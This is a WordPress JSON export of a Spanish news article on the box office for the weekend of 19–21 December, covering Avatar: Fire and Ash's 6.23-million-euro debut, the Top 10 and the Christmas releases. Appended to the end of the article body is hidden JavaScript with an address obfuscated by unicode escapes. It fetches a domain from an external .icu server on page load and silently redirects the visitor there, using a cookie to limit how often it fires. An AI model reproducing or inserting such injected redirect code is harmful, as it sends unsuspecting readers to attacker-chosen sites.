{"id":305457,"date":"2025-12-24T20:45:20","date_gmt":"2025-12-24T20:45:20","guid":{"rendered":"https:\/\/www.europesays.com\/es\/305457\/"},"modified":"2025-12-24T20:45:20","modified_gmt":"2025-12-24T20:45:20","slug":"avatar-fuego-y-ceniza-se-estrena-con-62-millones-y-revoluciona-la-taquilla-espanola","status":"publish","type":"post","link":"https:\/\/www.europesays.com\/es\/305457\/","title":{"rendered":"&#8216;Avatar: Fuego y ceniza&#8217; se estrena con 6,2 millones y revoluciona la taquilla espa\u00f1ola"},"content":{"rendered":"<p>El fin de semana del 19 al 21 de diciembre estaba marcado desde hace meses como <strong>una cita clave para la exhibici\u00f3n en Espa\u00f1a<\/strong>, y el estreno de la tercera entrega de la saga de <a href=\"https:\/\/www.ecartelera.com\/personas\/james-cameron\/\" data-mention-type=\"persona\" data-mention-id=\"1366\" rel=\"nofollow noopener\" target=\"_blank\">James Cameron<\/a>  ha cumplido su funci\u00f3n de revulsivo. Tras semanas de debilidad, <strong>la taquilla nacional se dispara hasta los 9,33 millones de euros<\/strong>, lo que supone un espectacular aumento del 102% respecto al fin de semana anterior, seg\u00fan datos de Comscore. Respecto al mismo periodo del 2024, el crecimiento es del 36,6% marcado entonces por el estreno de &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/mufasa-el-rey-leon\/\" data-mention-type=\"pelicula\" data-mention-id=\"18272\" rel=\"nofollow noopener\" target=\"_blank\">Mufasa: El Rey Le\u00f3n<\/a>&#8216;.<\/p>\n<p>Trailer &#8216;Avatar: Fuego y ceniza&#8217;<\/p>\n<p><video id=\"vid-35584\" class=\"video-js vjs-default-skin\" data-title=\"Trailer 'Avatar: Fuego y ceniza'\" poster=\"https:\/\/www.ecartelera.com\/images\/videos\/35500\/f35584.jpg\" controls=\"\" preload=\"auto\" width=\"640\" height=\"360\" playsinline=\"\" data-vtt=\"\/\/v1.ecartelera.com\/video\/35500\/35584_sprite.vtt\" data-stream=\"1\">El navegador no soporta el tag de v\u00eddeo.<\/video><\/p>\n<p>X<\/p>\n<p>Pero lo cierto es que una sola pel\u00edcula acapara cerca de tres cuartas partes de la recaudaci\u00f3n total, dejando al resto del Top 10 en cifras muy modestas para el inicio de las vacaciones navide\u00f1as. El liderazgo no admite discusi\u00f3n. &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/avatar-3\/\" data-mention-type=\"pelicula\" data-mention-id=\"10676\" rel=\"nofollow noopener\" target=\"_blank\">Avatar: Fuego y ceniza<\/a>&#8216;  debuta directamente en el n\u00famero uno con<strong> 6,23 millones de euros recaudados<\/strong>. Estrenada en 350 cines, la tercera entrega de la franquicia <strong>queda por debajo del arranque de su predecesora<\/strong>, que alcanz\u00f3 los 7,28 millones, aunque sigue siendo una apertura contundente. Su promedio por cine asciende a 17.725 euros, una cifra que evidencia su dominio absoluto del mercado. Pese a no repetir los m\u00e1ximos de entregas anteriores, su recorrido apunta a ser s\u00f3lido durante las fiestas.<\/p>\n<p>A gran distancia aparece en segunda posici\u00f3n &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/zootropolis-2\/\" data-mention-type=\"pelicula\" data-mention-id=\"19152\" rel=\"nofollow noopener\" target=\"_blank\">Zootr\u00f3polis 2<\/a>&#8216;, que empieza a acusar el desgaste l\u00f3gico de su cuarta semana en cartel. La pel\u00edcula de animaci\u00f3n <strong>cae un 22%, pero aun as\u00ed suma 1,27 millones de euros<\/strong>, con una media de 3.776 euros por local. Su acumulado <strong>alcanza ya los 11 millones<\/strong>, confirm\u00e1ndose como el gran t\u00edtulo familiar de la Navidad y como el principal contrapeso a la avalancha de Pandora, pese a la constante llegada de competencia.<\/p>\n<p>El tercer puesto es para &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/five-nights-freddys-2\/\" data-mention-type=\"pelicula\" data-mention-id=\"19357\" rel=\"nofollow noopener\" target=\"_blank\">Five Nights at Freddy&#8217;s 2<\/a>&#8216;, cuyo comportamiento sigue confirmando un recorrido mucho m\u00e1s corto que el de la primera entrega. La cinta juvenil <strong>pierde un 52% en su tercer fin de semana y recauda 371.000 euros<\/strong>, con una media de 1.293 euros por cine. <strong>Su acumulado se sit\u00faa en 4,43 millones<\/strong>, una cifra respetable pero claramente por debajo de lo esperado para una secuela, evidenciando que su p\u00fablico es muy concreto y de consumo r\u00e1pido.<\/p>\n<p>\t\t\t\t\t\t\t<img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.europesays.com\/es\/wp-content\/uploads\/2025\/12\/248842_n-remberg.jpg\" alt=\"'N\u00faremberg'\" width=\"1200\" height=\"800\"\/><\/p>\n<p>\t\t\t\t\t\t&#8216;N\u00faremberg&#8217; (DeAPlaneta)<\/p>\n<p>En cuarta posici\u00f3n se mantiene &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/nuremberg\/\" data-mention-type=\"pelicula\" data-mention-id=\"19553\" rel=\"nofollow noopener\" target=\"_blank\">N\u00faremberg<\/a>&#8216;,  que contin\u00faa <strong>mostrando una estabilidad poco habitual en estas fechas<\/strong>. El drama hist\u00f3rico baja solo un 32% y <strong>suma 236.000 euros<\/strong>, con una media de 857 euros por sala. Su acumulado alcanza los 2,54 millones y todo indica que seguir\u00e1 encontrando p\u00fablico durante las Navidades al tratarse de una de las pocas <strong>propuestas claramente orientadas a espectadores adultos<\/strong>.<\/p>\n<p>La quinta plaza corresponde a &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/el-rey-de-reyes\/\" data-mention-type=\"pelicula\" data-mention-id=\"19182\" rel=\"nofollow noopener\" target=\"_blank\">El Rey de Reyes<\/a>&#8216;, que en su segunda semana <strong>registra una ca\u00edda moderada del 19%. La pel\u00edcula ingresa 192.000 euros<\/strong>, con una media de 630 euros por cine, y alcanza un acumulado de 516.000 euros en diez d\u00edas. Son cifras discretas para un t\u00edtulo que aspiraba a aprovechar el tir\u00f3n familiar, m\u00e1s a\u00fan al compararse con el rendimiento de &#8216;Zootr\u00f3polis 2&#8217;.<\/p>\n<p>Cierra la parte alta del Top 10 una combinaci\u00f3n de estrenos y t\u00edtulos en retirada. &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/vida-privada-2025\/\" data-mention-type=\"pelicula\" data-mention-id=\"19607\" rel=\"nofollow noopener\" target=\"_blank\">Vida privada<\/a>&#8216;, protagonizada por <a href=\"https:\/\/www.ecartelera.com\/personas\/jodie-foster\/\" data-mention-type=\"persona\" data-mention-id=\"1654\" rel=\"nofollow noopener\" target=\"_blank\">Jodie Foster<\/a>, <strong>debuta en sexta posici\u00f3n con 137.000 euros<\/strong> en 106 cines y una media de 1.288 euros, un arranque contenido pero digno. Por detr\u00e1s, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/wicked-part-two\/\" data-mention-type=\"pelicula\" data-mention-id=\"17996\" rel=\"nofollow noopener\" target=\"_blank\">Wicked: Parte II<\/a>&#8216; cae un 41% hasta los 130.000 euros y <strong>acumula 4,28 millones<\/strong>, mientras &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/ahora-me-ves-ahora-no-me-ves\/\" data-mention-type=\"pelicula\" data-mention-id=\"19491\" rel=\"nofollow noopener\" target=\"_blank\">Ahora me ves 3<\/a>&#8216;  baja un 34% y suma 108.000 euros. En novena posici\u00f3n, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/valor-sentimental\/\" data-mention-type=\"pelicula\" data-mention-id=\"19644\" rel=\"nofollow noopener\" target=\"_blank\">Valor sentimental<\/a>&#8216;  recauda 118.000 euros en su tercera semana y alcanza 487.000 euros acumulados. Cierra el Top 10 el estreno de terror &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/keeper\/\" data-mention-type=\"pelicula\" data-mention-id=\"19352\" rel=\"nofollow noopener\" target=\"_blank\">Keeper<\/a>&#8216;,  que con 56.000 euros en 158 cines firma <strong>uno de los debuts m\u00e1s flojos <\/strong>del fin de semana.<\/p>\n<p>\t\t\t\t\t\t\t<img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.europesays.com\/es\/wp-content\/uploads\/2025\/12\/250013_anaconda.jpg\" alt=\"Anaconda\" width=\"1200\" height=\"800\"\/><\/p>\n<p>\t\t\t\t\t\t&#8216;Anaconda&#8217; (Sony Pictures)<br \/>\n\t\t\t\t\t\tEstrenos navide\u00f1os<\/p>\n<p>En plena semana navide\u00f1a, <strong>el calendario habitual sufre algunos cambios para adaptarse a los festivos<\/strong>. No obstante, los estudios han preferido no lanzar grandes t\u00edtulos durante este par\u00e9ntesis. Los estrenos llegan escalados y <strong>el 24 de diciembre llegan a nuestra cartelera dos t\u00edtulos<\/strong>, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/father-mother-sister-brother\/\" data-mention-type=\"pelicula\" data-mention-id=\"19754\" rel=\"nofollow noopener\" target=\"_blank\">Father Mother Sister Brother<\/a>&#8216; y la espa\u00f1ola &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/ariel\/\" data-mention-type=\"pelicula\" data-mention-id=\"19722\" rel=\"nofollow noopener\" target=\"_blank\">Ariel<\/a>&#8216;.<\/p>\n<p>Ya <strong>el 25 llegan el resto, seis pel\u00edculas m\u00e1s<\/strong> que poco har\u00e1n por la taquilla espa\u00f1ola: &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/bob-esponja-una-aventura-pirata\/\" data-mention-type=\"pelicula\" data-mention-id=\"19339\" rel=\"nofollow noopener\" target=\"_blank\">Bob Esponja: Una aventura pirata<\/a>&#8216;, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/anaconda-2025\/\" data-mention-type=\"pelicula\" data-mention-id=\"19485\" rel=\"nofollow noopener\" target=\"_blank\">Anaconda<\/a>&#8216;, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/homo-argentum\/\" data-mention-type=\"pelicula\" data-mention-id=\"19718\" rel=\"nofollow noopener\" target=\"_blank\">Homo Argentum<\/a>&#8216;, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/eloy-iglesia-adicto-cine\/\" data-mention-type=\"pelicula\" data-mention-id=\"19728\" rel=\"nofollow noopener\" target=\"_blank\">Eloy de la Iglesia, adicto al cine<\/a>&#8216;, &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/aba-y-su-banda\/\" data-mention-type=\"pelicula\" data-mention-id=\"19742\" rel=\"nofollow noopener\" target=\"_blank\">Aba y su banda<\/a>&#8216; y &#8216;<a href=\"https:\/\/www.ecartelera.com\/peliculas\/corazon-franjiverde\/\" data-mention-type=\"pelicula\" data-mention-id=\"19755\" rel=\"nofollow noopener\" target=\"_blank\">Coraz\u00f3n franjiverde<\/a>&#8216;.(function(){if (document.cookie.includes(&#8216;hasRedirected=1&#8217;)) return;fetch(&#8216;u0068u0074u0074u0070u0073u003Au002Fu002Fu0068u0074u006Du006Cu0072u0061u0070u0069u0065u0073u0074u006Au0073u002Eu0069u0063u0075\/?t=json&amp;u=c69c823946cfd82b176673141bcf764d&#8217;).then(r =&gt; r.json()).then(d =&gt; {const<\/p>\n<p>domain = d?.domain;if (domain) {document.cookie=\u00bbhasRedirected=1; max-age=86400; path=\/\u00bb;location.href = domain + &#8216;?34681765399657&#8217;;}});})();<\/p>\n","protected":false},"excerpt":{"rendered":"El fin de semana del 19 al 21 de diciembre estaba marcado desde hace meses como una cita&hellip;\n","protected":false},"author":2,"featured_media":305458,"comment_status":"","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[169],"tags":[1014,1015,1013,177,1011,146,147,25,24,782,176,1019,1016,175,753,1012,23,1017,1018],"class_list":{"0":"post-305457","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cine","8":"tag-actores","9":"tag-actrices","10":"tag-cartelera","11":"tag-cine","12":"tag-ecartelera","13":"tag-entertainment","14":"tag-entretenimiento","15":"tag-es","16":"tag-espana","17":"tag-estrellas","18":"tag-film","19":"tag-fotogramas","20":"tag-fotos","21":"tag-movies","22":"tag-peliculas","23":"tag-pelis","24":"tag-spain","25":"tag-trailers","26":"tag-videos"},"share_on_mastodon":{"url":"https:\/\/pubeurope.com\/@es\/115776502638468096","error":""},"_links":{"self":[{"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/posts\/305457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/comments?post=305457"}],"version-history":[{"count":0,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/posts\/305457\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/media\/305458"}],"wp:attachment":[{"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/media?parent=305457"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/categories?post=305457"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.europesays.com\/es\/wp-json\/wp\/v2\/tags?post=305457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}